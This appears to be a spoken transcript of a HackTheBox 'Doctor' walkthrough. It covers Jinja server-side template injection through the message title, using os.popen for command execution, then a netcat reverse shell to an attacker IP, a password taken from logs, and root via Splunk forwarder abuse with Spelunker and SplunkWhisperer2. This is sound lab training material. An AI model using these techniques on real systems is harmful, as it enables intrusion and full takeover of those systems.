Welcome back, everybody. Great week to be here. This is Justin with Parity InfoSec, again here to show you the latest retirement from HackTheBox, Doctor. Doctor is an easy box, and it was developed by Shaun, egotistical SW. He's one of the content developers for HackTheBox, and he's really good at getting into those easy boxes, easy to medium. He also was the one that masterminded the Dante lab, so really putting some information and some exercises out there for folks that haven't seen a lot or they're just starting out in this career field. There's two technologies that we're going to take advantage of here. One is we're going to do some server-side template injection, and it's just taking advantage of the way that the server is going to process some of the variables that get passed to it, and we're going to be able to use that to get code execution. From there, we'll go into a couple other things for moving users and your standard, but ultimately the final root Privesc is going to come from a Splunk universal forwarder issue, and it's not really a CVE. You have to have authenticated credentials, but it adds a malicious app, and so we'll talk about that. There's ready-made exploits out there for kind of both of these, mostly for the Splunk, and then I'm going to show you some of the templates or some of the different payloads and things that I use for server-side template injection. To do this, the tools are pretty basic. There's going to be, your browser is going to be used. There is going to be some Gobuster at the beginning to talk about where to find some of this stuff. I'm going to use linpeas as a pretty quick and simple privilege escalation tool. And we're going to look for some logged information, nothing too fancy. And then after we get into our second user, we're going to use the tools, either Splunkr or SplunkWhisperer. I'm going to show them both to you. And we're going to show you how I did it locally with the bash script. And then there's also a local and remote Python called SplunkWhisperer. We're going to cover all that, rock right into root, and be done with this box, ready to move on to other greater things. So let's get started. Let's kick this off with a little bit of NMap. So NMap, and the box we're hitting is 209, so 10.10.10.209. I'll just throw out a pretty simple basic ports and see what comes back. Here you've got 22, so there's SSH on the box. There's going to be a web server, port 80, and then there's something else on port 8089. So what I want to go ahead and do is just give it those ports. I'm going to leave out 22 because we know what that is. 80, 89, and then we'll do scripts and versions. Let that run. Shouldn't take too long, but we know we got some kind of web server. So let's go over here and take a look at our web server. 10.10.10.209. And what we get from here is Doctor. Looks like a nice little website. It's got some drop downs. Some of the images aren't loading, so that's just an issue of being on the HackTheBox network. You can see that none of these are actual working links. These are all hashtagged out. Departments is going to kick us kind of back to the same page, and it's just a loop. It's got a phone number. It does have this right here, so it gives us a domain, doctors.htb, and we're going to take a look at that. I think that'll come in handy. See if there's anything else here, and we'll look at the page source. Usually I just scan this for these little green boxes looking for any kind of comments. This one is pretty quiet. There's a little bit here about template required scripting, nothing major. And we'll go ahead and ask for the robots.txt. So nothing there. We'll go back and see what we got from this. This NMap is saying Doctor. Nothing too handy here, but on 8089 there is an SSL HTTP service for Splunkd, and it has a robots.txt, but the only entry is that, so you're not going to be able to find it if you were going from a spider tool. So not a whole lot here, but it does tell you there's Splunk. It tells you there's a couple websites to look at. 8089 we'll get to in a minute, but I want to cover this. We saw it was Doctor. If we go back to the page, our domain that we were given was doctors.htb. So let's go ahead and put that into the system. Just open a new tab here. So sudo nano etc host. That's not gonna work. All right. So again, 10.10.10.209, and it's gonna be doctors.htb. Save that. We'll come back to this page and let's go browse to that website and see http doctors.htb. And when you load it up this time, it actually shows it as the Doctor Secure Messaging System. It's asking for a login, but it also has an option for registration. So that's pretty handy. Let's go ahead and register. I'm going to just call this Parity. This will be, in case you need to get a hold of me, Parity. It's going to be info@parityinfosec.com. I'll just put in a quick password. This one does not have any crazy requirements, and we have an account. One of the things of note is that it is created with a time limit of 20 minutes. So we'll go ahead and log right into here. Not a whole lot to be seen. There's a home. The home is here. This is an account. You can just update your email or your username. And then there's a new message block. Okay. So what I like to do here is I like to cover cross-site scripting, usually, trying to see if it's got any kind of reflected, stored cross-site scripting. So usually just start with a script, and there's a couple ways that you can write this. This is the way that I normally write it. So 1, 2, 3, and I will close it out. Hopefully with the right spelling. I'll take this same block, and one of the things I learned over time is don't just copy it, change the number. That way you know which field is injectable. We'll go ahead and post this, but what you see here is nothing happened. It's all kind of the same. So it's not executing JavaScript. Let's look at the page source. When you come down to the page source, it says archive still under beta testing with a link to archive. Let's just check out Gobuster real quick, because this is one of the other ways that you can find this information. So just do a Gobuster directory. We're going to give it doctors, because there's definitely different sites whether you go to doctors or if you go to the address. We'll go to my opt, seclist, discovery, web content, and then we'll go with raft large words. And that'll be .text. I generally don't run it with too many threads. Sometimes it's better or worse depending on how my network's doing that day. So lately it's been a lot of 30-second timeout with 150 threads. Everything looks good. We'll go ahead and let it get started. And then you're going to find things like home, register, login. All this stuff is there. Here's archive. Whoops, archive. So archive exists. There is that reset password link. And it seems like this is going to take a while today, so it's running a little bit slower. I'll go ahead and stop it. I just wanted to show that if you'd done a Gobuster before poking around the page, if you missed it on the view source, you would still find it if you did a Gobuster. So always try to have a couple different enumeration tools working at the same time to help you out, just like I ran the NMap in the background with scripts while I went ahead and looked at the website. Close that out. Let's take a look at archive. So, all the way back, archive. We don't see anything. I'm going to view the page source. It's kind of interesting. When you view the page source, it says archive, but then there's this other block that says item title, and then it has, that was the code that I put in. So, one of the things I told you about was I changed 1, 2, 3, and then 4, 5, 6, just so I know which block it is. I can see that this is a title issue. So whatever's happening here, it is pulling the title and not the actual content or text of the message. And this kind of is where I ran into a stopping block. But if you do a simple item title exploit, I know it seems not intuitive, But there's just something about, if you don't know, just Google it. Just try something, especially with these easy boxes. They're not that hard. They don't go too far out in the weeds. But we did come across a lot of articles. This one's about exploiting cross-site scripting, which I tried, but we know that that doesn't work. You also run into this one, server-side template injection from Portswigger, the makers of Burp. So James Kittle, really smart dude. I got to listen to him talk at Black Hat a few years ago. Really knows stuff. He's behind all the cool things that are coming out. And this is just his explanation of how the concept works. So there will be code as simple as like dir, and then it takes in a variable called first name. So dir you, and then it's going to pull that from some of the parameters of the file or the website so that it can autofill the information and then render it. Pretty basic. In this one, you have a couple checks. And I really like the checks that I found. These are pretty good. But there was a really nice image that's been floating around that shows you the different ways that you get to server-side template injection based on what kind of server-side code is running. It's a nice little graphic as well. But essentially, it comes down to this. There's 3 different tests that you can run to determine if it's running Smarty, Mako, Jinja, or Twig. Twig is a very common one, but it's all going to be based on these yes, no, true, false. So we're going to try running this code, just a single bracket, 5 times 5. If it is running this, pass would be a 25. It'll actually do the math. A fail will be just printing the same information. Very similar to what we saw when doing the cross-site scripting test. For me, I like to update this because for a while there I was adding, and it just makes it a little bit messy. We'll go ahead and put in here just 5 times 5, and then content nothing. So it says 5 times 5. It didn't run. But what you have to verify is, we'll view page source here, because it's all about what it's processing in the archive side, because that's where the template injection is happening. It's still coming back 5 times 5, so that's a fail. So going off of this chart, you would go to the next one, and that is double brackets, 5 times 5. So we'll just update this, come in here, go to bracket, and post. And this is the back and forth process, a little annoying, but here we go. We'll close this out because we really want to just look at this. I hit refresh. That time it came back 25. You can kind of see the difference of where we're going. So that one is a pass. So it would have been not vulnerable if it came back with the double bracket 5 times 5. But we do know that it is here now. That still gives us one last test. And it's going to tell us Jinja, Twig, or unknown. So little closer. Let's try this one. So we're going to update this, and we'll put one of these brackets in, or we'll put single quotes in. And what you're going to see is there's 2 different ways that the code is going to be executed. One is going to multiply them as numbers, 5 times 5. One is going to run similar to a Python code, 5 different copies of this character. So it'll have 5, 5, 5, 5. So in this example, that's what you get is 5 5s. So 5 5s actually lines up with Jinja. So there's some more information in the article that talks about this. But now that we know that it's Jinja, that kind of tells us a little bit more. We can get specific about it. So Jinja SSTI. And there's a couple different blogs. We'll open a few. P equals MP has a little cheat sheet, but the coding on here didn't exactly work for what I was trying to do. So we'll take a look. And they're showing how they could do this on an example that they ran for folks. You see the double 7 times 7 equals 49. And that's all running on a Flask server. The next test that you can run is config.items, which tells you all the configurations for that system. So I'm just going to copy this and come back over here. We'll just update the same thing. And we're going to see if it comes back with a configuration. If it doesn't, then it's a different system. But it does. So we know for sure we're using Jinja because that's the way that this works. I'm going to go ahead and do this for ease of viewing. If nothing else, I'm going to open up my Burpsuite. This is a nice new version. I love it. It looks pretty, if nothing else. All right. We'll just open it up. Always remember when you open up Burpsuite to go into your proxy and turn off your intercept if you don't intend to intercept. I just want to be able to replay what I'm looking at. So if I hit F5, it's going to resend a request, and you can find it here in HTTP history, and it still looks really ugly. So if you go to raw, it stops word wrap, and it allows you to kind of view what you're looking at. So we can see that the debug is off. We can see testing is off. The environment is called production. And you just roll through all the different settings about cookies. Is there max file size, file age, preferred URL schema, HTTP. It's going to use some JSON. There is a mail server. It's kind of funny that says mail server 587, and that's part of the ability to reset passwords. But it's doctor. Okay. It does give you information about there's a SQLite server running, and it's running in home, web, blog, flashblog, site.db. So this is a pretty good chance this is our user is web in this home directory. And this is where some of the information is going to lie. So it tells us a little bit. Let's see what else we can find. Now this code kind of goes through and tells you how you can find more information about the OS. And I'll show you what happens. So I ran this, and I was ultimately unsuccessful. When you come back in here and you push this, you start getting 500 errors. So it's just not able to process. So I went through this article, and it stepped through a couple different ways that you can go look for all these disclaimers for all this information. But it was ultimately not successful. The article does go in and talk to you about looking for sub-processes like popen. Okay, popen is what's going to allow you to open applications and run code. You find a lot of the same material here, and it did with a little bit of a pop-up instead. So they were able to get this site had cross-site scripting. And they're going to go through all the same process of trying to find these different modules, looking through. Again, did not work for me to get the configuration information. So I went to this cheat sheet, and this cheat sheet was asking me to do these requests, and then trying to execute and extract classes. I'll show you. I was not able to get this to work as well. So post, refresh, still a 500 error. Oops. The remote code execution kind of relied on this subclass offset, knowing which subprocess we wanted to use. So open is 40. It's the index of where it sits in the config items. Same thing about this one. This one allowed you to do touch. And there's a couple other ways that you would bypass the filters. What ended up working out really well for me was actually payload all the things. So I'll use that for reverse shells and some other stuff I'm looking at. But they have a section on SSTI. Go ahead and turn my proxy off right now, just because I don't need it. So inside of payload all the things, let's see if we can find it. Server-side template injection, and then there's images. No, okay. It's down here. So this is where you get into the other languages that I was talking about. So you've got Ruby, Java, Twig, Smarty, FreeMaker, Pebble, and here's all the Jinja stuff. So we'll just go ahead and click on Jinja. gives the information, kind of explains the same thing. These are the different tests that you would do to get your yes, no, go, no go. And then it gives, if there's debug enabled, you would do this. If you want to dump all the classes, you should be able to do this. But again, was not successful. So as you do this over and over again, you get really frustrated fast because all these tests are telling you to do, everything that they've recommended as a test is not working. Now, I kind of just kept going down because you don't know any of the offsets. And I went for broke. I was like, I'm just going to go all the way. And this one is what the code looks like if you just were to use a global variable of, here's our os.popen. All right, update this. So popen list, hit this. And that time I did get an ls because it came back blog.sh, archive blog. Let's go ahead and update it just because I like to see it this way. So ls lia, we're going to post that and refresh this. Now it's showing me the whole directory. So this is definitely getting code execution on the server. So I'm going to go to my good old default, which is I'm going to pull down a netcat, my copy, because if I try to run this copy, it's not going to allow me usually to have the -e function in order to make up a reverse shell. So we're going to go ahead and bring our own copy in. And to do that, I'm just going to check real quick to make sure that they have a dev shm, because that's where I like to hide my files, dev shm. And then again, we'll do an ls on that. ls lia dev shm post. And that directory does exist. So we're good to go. So in order to do that, I need to make sure that I've got my web serving capability. So I'm going to go to my var www.html, and I'll just do a sudo python 3 mhttp server on 80. So we are serving, so I can get my netcat over there. We'll just go back to the page, update it. And this is the problem that you're going to run to. I'm moving pretty fast, but that still was 20 minutes. What you're going to run into is you're just going to have to keep making this login. So you can script it all the way down to a couple seconds, really. But for this, I'm going to go ahead and just sign up for the account again. And just move on from there. Just make sure you remember all the information you put in here because, it actually allowed me back in because I was already here. But what you're going to see is it doesn't remember the messages. So one of the ways I kind of worked my way through this was go back here. Oh, it's not going to let me do it. What a bummer. All right. So we'll bring that code back in from payload all the things right here. So we'll bring this code in. And I'm going to have it which wget. And I'm actually going to ask it for my ID as well. So let's do a couple things to do enumeration. ID, hostname, which wget, post, and this is all here, so I'll refresh. And you're going to see the ID is in fact web, part of the admin group. The host name is doctor, and we do have a copy of wget. All right, let's get started on this. We're going to go ahead and go back into here and update it and just wget the file that we need. So I'm going to wget 10.10.14.3 / nc, and then I'm going to output it to dev shm nc. I'm going to ls lia for dev shm and just make sure it's there. So we'll start at that point. So we did a wget and it is 35.520. I was having an issue before where I was outputting it incorrectly and getting the wrong file size and things like that. but it's pulled over fine. But you will see every time you pull something out of the box, it's not executable. So you got to remember to go back and do a chmod. So we'll update this, and now that it's in there, we can just copy back to here, chmod plus x nc, and then I'm going to set up my reverse shell right here, and we'll just do dev shm nc 1010 14.3. We'll run it on 8888 tac e, then I'm gonna have it pass over a bin bash. That all looks good. Make sure it's got the quote, and then we need to set up our listener. So nc nblp 8888. Get one more. There you go. All right, we'll go ahead and run this. Post, refresh, and you see it hung. So it's still doing some kind of process for us. And sure enough, it's sitting right here. If I say ID, it's getting there. But I have kind of a weak shell, so let's do the upgrade. Using Python 3, you'll run a command of import pty, and we'll get ourselves an upgraded pty shell by spawning the process again inside. And just do a bin bash single and a double. Nope. These actually need to be doubles here. So double bin bash double single run. And we now see we are web doctor. And we're sitting in our home directory, right? And our home is home web. So lslia. There's no .ssh, so we're going to be stuck here with this shell for a little bit. The bash history is going straight to dev null, so we can't sneak a peek at what they've been working on. Can't do a whole lot, so this probably isn't the user we need to be at. So this is user 1, but we're going to need a second user. I'm just going to go straight over to dev shm. Now I can see I've got my nc, so I'm just going to do another wget, this time 1010 14.3. I'm going to pull over linpeas.sh. Pulls over successfully. Again, change the, or modify the permissions. Chmod x, and then linpeas.sh, and then we'll run it with a /. So linpeas.sh. Give it a second to start spinning up here. My favorite little picture. Thank you. Carlos did a great job for the community by building this. We're going to be generally looking for a red yellow, but in this case it's going to be just an issue with information that's in the log. But I'll start from the top just to give you guys a good review of how to look at these. So from the top, you're going to see that this is running Linux. Obviously, it's Ubuntu 20.04 LTS, limited on support. You see some of the environmental variables. We do see that this is running inside a VMware AMD 64-bit CPU architecture. None of that's really going to come into play, but when you get into HackTheBox, you're going to want to look for all that kind of information. We did see this information when we were looking at our variables for the website, so that information is still valid. And we'll just keep going down. You would normally look through all these processes. We do see Splunkd is running on 8089, and it is running as root. All right, that's important to keep in mind. We're going to see it's about only things really running. You see inside a web, you're going to see one of my commands. This is obviously another command. This is me running linpeas. So inside of linpeas, it runs ps aux. It does a sort. All these things are associated with that process I was running. There is one here called Python 3 home web blog run.py. So that's going to be them running that website, serving on the virtual domain of doctors.htb. It's running on Python 3. If you remember some of the information that we got before, the NMap showed Apache was the web server, but doctors.htb is actually running on a Python server. So we go back in here, you're going to see it's running workzug Python. So It's not exactly the same server, even though they're running on the same port. So let's quick down and dirty on that one. There's some information here, but none of this is really groundbreaking. So I'm going to scroll down. We do see that it is running 10.10.10.209. It's not running in any kind of Docker from the appearance that we get. It's running 22.631, 8089, 5000, and we'll just keep going down. It does say we're sitting in the admin group, so we forget that, but he is an admin. So what can we do with admin? Gives us access to a few more files. And those files are really going to be the log files, because as an admin you need to be able to look through logs. So let's take a look, and sure enough, the readable files belonging to root and readable by me but not world readable, that puts us in that ADM group, and that's access to all the different logs, Apache logs, cups, and we'll just keep going down. There is a public ring with GPG. We're not going to get into that. We're not going to get into database. Database doesn't give us much, if anything. But we do know that there are some files. So this ran through some of the database. I don't really care about that. Go all the way down into this section, and it starts looking for passwords inside logs. So this is one of the cool features. Make sure to check here on every scan if you're running linpeas. And you're going to see get reset password with a Gobuster, post reset password, and the email they provided was guitar123. Well, that's not right, but it is interesting. So guitar123. Right after that, what you're seeing in the log is SSHD. So somebody tried to SSH in with a failed password for invalid user Shaun. So Shaun is not a valid SSH username. They tried to do a bunch of things, sudo Shaun, and did get home Shaun, but that was done by user root. So we know that we have what looks like a password. We know Shaun. Go ahead and we'll open a new tab and try SSH Shaun at doctors.htb. And we'll put in guitar123. But again, just like the log said, it's not a valid user. Okay, well, let's do a quick check. Etsy password. Shaun is a valid user. We've got one for Splunk, one for Shaun. If we go up here, everything looks about the same. Web is right here, and that's the user we're using. Well, the next step you should really look at is just sue from here. So sue Shaun. It's going to ask and put in the information, and now we're Shaun. So even though you couldn't SSH in, it's still a valid user on the box. The information was still good and valid, and it looks like somebody did try to run SSH. That's where you get into really checking the logs. So this is one of those boxes that it kind of demands it, so make sure to take a look at those. So we're Shaun. I want to go to his home. ls, there's user, so let's cat USER.TXT. And we've got our user, so done, boom. SSTI was a weird concept for me, but I took you through it really fast using some of the cheat sheets. If you know what you're looking for. If you do not know what you're looking for, it took a little bit longer. It took me a little bit until I got enough of the hints to go, okay, that's what I should be looking for. But again, I showed you, just Google it. If you know nothing else, Google some of the things that you're seeing, and you might run across something. Good idea to keep for later. So now we want to do some Privesc. Let's try sudo L. Okay, we know it's guitar123, not a sudoer. Okay, Let's do that Etsy password again. Oh, it's actually still up here. It doesn't get us a lot of information. Groups. So he is only a member of the group called Shaun, so we're not going to have any special permissions there. We can try and run linpeas again, but it's really not going to get us much more than what we got now. This one comes down to an RCE exploit, and you know that by looking at some of the information in the main page for Doctor on HackTheBox. But we also know that we've encountered several Splunk hints, and we know 8089 is there. So what can we do with that? I'm going to go back to Google. We'll do it on this one. So in Google, we'll just do Splunkd exploit 8089. There's some. And the first thing that pops up is the Splunk Universal Forwarder Hijacking. There's a couple other tools that kind of come into play. There's an exploit available on MSF console, Metasploit. There's some information on how to take advantage of them. There's also this file right here called Splunk Universal Forwarder Hijacking 2, which came out in 2019. So there's a couple different things. We'll take a look at this one, and this is by Clement Noten. He was one that kind of put all this stuff together. We'll look at his GitHub here in a second, but he ran a version called version built off of Sharp, and then a version built off of Python. If you have access to C#, cool. Otherwise, I really just recommend running it on Python anyways. It's going to work out in your favor. This was his kind of first draft at how to get it to work. We're going to go ahead and take it to the next level and look at some of the applications or the codes that were written. You can see there's links. I like this because you can remotely contact this if you have the credentials. But the first time I ran through it with a code called Spelunker. So Spelunker, not Splunker. And it was put together by Tavora Threat. It's kind of an in-between of what the original POC was and what the final code for SplunkWhisperer was. But I like this because it is running bash. It's something that you can easily drop on the system, and it's going to run through and take you straight to root. I'm going to go ahead and hit the raw. I'm going to copy all this. And you can run it. I like the way that this is built. I like to just put it on my system and then wget it back down. So I'm going to do a sudo nano, and we will nano this as doctor.sh. There we go. We'll paste this in. All this code is here. It does say that at the very beginning, this is all assuming that the creds are admin and change me. And you can run it, but what you're going to find out is it doesn't work with admin change me. This admin change me is what ends up in the web request as the, can't see it here, so I'll kind of pull over, but it ends up as the basic authentication that you're going to use to submit it. So you can see the basic authentication kind of starts here, and it provides the information, and it's going to run back and forth on this local box. So it's a little bit hard. We'll go ahead and save this real quick, and then I want to cat this because it's going to be a lot easier for me to pull it off. So this code right here, basic authentication, is always just a base64 encode. So we'll go back to burp because I really like their decoder function. If I decode this as base64, it's going to say admin change me. So that's what they mean by that. If you try to run this like this, it's not going to work because it's not admin change me. Well, we do have one set of credentials, and we're going to try that. And to do that, I can just kind of edit it right here and say Shaun, and then guitar 1, 2, 3. And all I have to do over here is encode it back into base 64. So copy that, and we'll go back in and edit this file. Now we want to keep that single quote in there because that's going to be capping this, which is the header field for authorization. It's a cookie field, authorization basic, and then we'll just paste this in. And there's a couple times this code is used, so just make sure. You can do a find and replace. You can use obviously a GUI tool for editing these files, but I just like this the way it is. All right. We'll come back over here. I'm going to go back into the dev SHM and wget. So wget 10.10.14.3, and that was, what do we call that? doctor.sh. All right. And if I just run doctor.sh, permission denied. So let's chmod plus x doctor.sh. And so it's running, and it's running that Splunk forwarder message. So we'll come up at the top. So running it, it's going to print all that information out. It's going to create a temporary workspace, which is in the temp directory. It's going to create a payload, and it's a malicious app that it's going to build just to run what we want to run. In this case, it's just going to give us a shell. Here is the malicious Splunk app. It's all put together. Edit. That's all the information, and then it goes back and removes it. So it loads it up, runs it, removes it, and it says if all went well, run this command for your root shell. Run who I am if your prompt didn't change. So your prompt may not change, especially like before it was just no prompt if you wanted it that way. So I'll just copy it in here, paste this, and I've got my root prompt. ID, it says Shaun, but it says my effective EUID is root. So if I say who am I, it says I'm root. CD root ls lia, and you're going to see there is a root.txt, so cat root.txt, and there's my root. So we went through user 1, user 2, right into root, pretty much pre-made code, a little bit of editing required and a little bit of understanding of the SSTI. I'm going to hit one more thing before we finish, and that's just to talk about the remote access capability that you get from SplunkWhisperer. To do that, we're going to go over to GitHub. Did I have it open over here? I did not. So we're going to open this SplunkWhisperer. I'm going to pull the whole thing down, and it's just talking about the same thing, that there's a .NET version and then there's Python. There's a local version and a remote version. So with that, I'll just do a git of this file on my system. So let me change to opt, sudo git clone, and then we'll just go into SplunkWhisperer ls, and this is where I'm going to go into the Python version, and then I'm going to run Python 3 py SplunkWhisperer 2, and this is where you would say if you want remote or if you want local. I don't want to transfer it over to the box. I want to show, because they do allow outside connections. I'm going to go ahead and run this on remote, and it's going to ask me for some information. So it's going to ask for the host, the port, lhost, lport, because we're going to serve a payload with username and password, and this is where it will do the basic authentication for you, and it'll come, or the basic authorization, it'll go ahead and make that base 64 encoded information, and then the payload is going to be whatever command you want to run. So in this case, We're going to do remote. I'm going to say that my host is doctors.htb. If you try to run it on the IP, not going to work. It might work. Actually, I think it will. But we're going to just tell it this. 8089 on doctors.htb. My L host, which is 10.10.14.3. I'll go ahead and give it an L port. It, I believe, would make its own, but I'm going to run on 7.7.7.7. All right. The username is going to be Shaun. The password is guitar1234 or 123. And then we're going to give it a payload. You can use a file, but I'm just going to do a simple payload. We know what files are on the system, so we'll just do dev shm, and we'll do a netcat payload reverse again. So 10.10.14.3, I'm going to run on 9999, and then I'm going to ask for a bin sh. Let's open a new shell and just do nc nvlp 9999. That listener is hanging out. We're going to close this out with a single quote. All that looks good. I'm going to go ahead and send it. Oh, did not like mine. Let's try double quotes. Play. Oh, it's play. Put playload. That's not going to work. All right, so this one's a lot cleaner because it's running and just spitting out little basic stuff. So just going to verify that this is the password. And so with SplunkWhisperer, if you put in admin change me, it would have automatically stopped right here and said, couldn't authenticate. So it's a nice little tweak if you're unsure. It's going to create the malicious app bundle. It's going to put it here. It's going to start an HTTP server on port 7777, a lot of sevens. That's the one that I specified in as my L port. Now we're going to see that it pulled it. So you're going to see 10.10.10.209 did request this file. And then it says the app's installed. So your code should be running. You just hit return. And it stopped it. Removing app removed, stop HTTP server. If we come over here, we do see that it connected. And if I say ID, you're running as root. Not an effective user ID, a genuine user ID of root. If I just do Python 3 C import pty spawn bin bash and close that out, you're going to see we are root doctor with the prompt. So if we just go into cd root ls, there's our root.txt, and we'll go ahead and cat that again, cat root.txt, and there it is again. So those are the two different ways that you can use the exploit for the universal forwarder, either through Spelunker as a bash script locally on the box, or even remote. If you have the credentials, you could have skipped a lot of this and gone straight for root. So pretty cool box. I want to thank again Egotistical. Shaun Wharton did a great job on this box. I'm a big fan, especially going into Dante and some of the other things. With the pretty basic functions that are available here, it's not too hard of a box, but it comes down to research and knowing the technology. So don't get frustrated, or try not to get frustrated. Definitely don't get down about it, because a lot of these boxes are introducing new things every single time you do them. It's something new that you haven't seen before. Don't feel bad. Learn from it. If you don't know, go look on the forums, go ask some questions, get on the Discord. I'm available on Discord. Here's my information as well. Contact me. I don't mind. I'll try and help you out wherever I can. No matter what the box is, I'll do my best. But I thank you guys for coming out. Please, if you haven't done already, subscribe down below. And then I'll see you guys next time.